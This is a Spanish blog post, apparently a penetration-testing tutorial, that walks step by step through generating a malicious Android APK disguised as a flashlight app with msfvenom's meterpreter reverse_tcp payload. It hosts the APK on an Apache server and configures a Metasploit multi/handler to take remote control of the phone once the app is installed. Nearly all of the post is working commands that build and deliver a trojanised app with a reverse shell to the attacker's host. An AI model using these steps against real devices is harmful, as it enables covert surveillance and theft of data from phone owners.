Buenas a todos, tras la decisión del equipo de Metasploit hace ya algún tiempo de retirar msfpayload y msfencode, Msfvenom se convirtió en nuestro aliado, uniendo las capacidades de ambos, aunque con algunos pequeños cambios a la hora de utilizarlo.
Hoy, quiero centrarme en enseñaros como podéis controlar un dispositivo Android a través de Msfvenom y Msfconsole. Hace un par de años, mi compañero Pablo nos enseñaba en su artículo "Meterpreter en Android: El desembarco en tu smartphone" como podíamos realizar esta labor mediante msfpayload, pero actualmente está deprecated, por lo que hoy veremos como realizar esta misma labor con Msfvenom.
El primer paso a realizar será generar un APK malicioso que hará de agente/bot. Este software debería ser instalado en el dispositivo Android a controlar. Por ejemplo, yo realizaré las pruebas en un entorno local:
msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk
A continuación, y con el fin de facilitar la carga del APK en el móvil, levantaré un Apache2 (en Kali 2), y copiaré el APK a la carpeta raíz del servidor web:
service apache2 start
cp /root/linterna.apk /var/www/html
El siguiente paso será iniciar msfconsole, cargar el exploit y el payload reverse_tcp de Android:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
Posteriormente configuraremos la dirección IP donde dejaremos el manejador escuchando y el puerto que previamente hemos indicado al bot al que se debe conectar:
set LHOST 192.168.1.50
set LPORT 4444
Finalmente ejecutaremos la instrucción exploit:
exploit
Ahora si instalamos el software que previamente habremos alojado en la ruta http://192.168.1.50/linterna.apk dispondremos de control sobre el dispositivo.
Disponemos de un gran listado de comandos para interactuar con el dispositivo:
Si realizáis numerosas pruebas con él, veréis que no es 100% estable, y cuando traemos grandes cantidades de información del dispositivo suele colgarse. Pero solo tendremos que volver a abrir el APK instalado para tener control de nuevo sobre el terminal.
Saludos!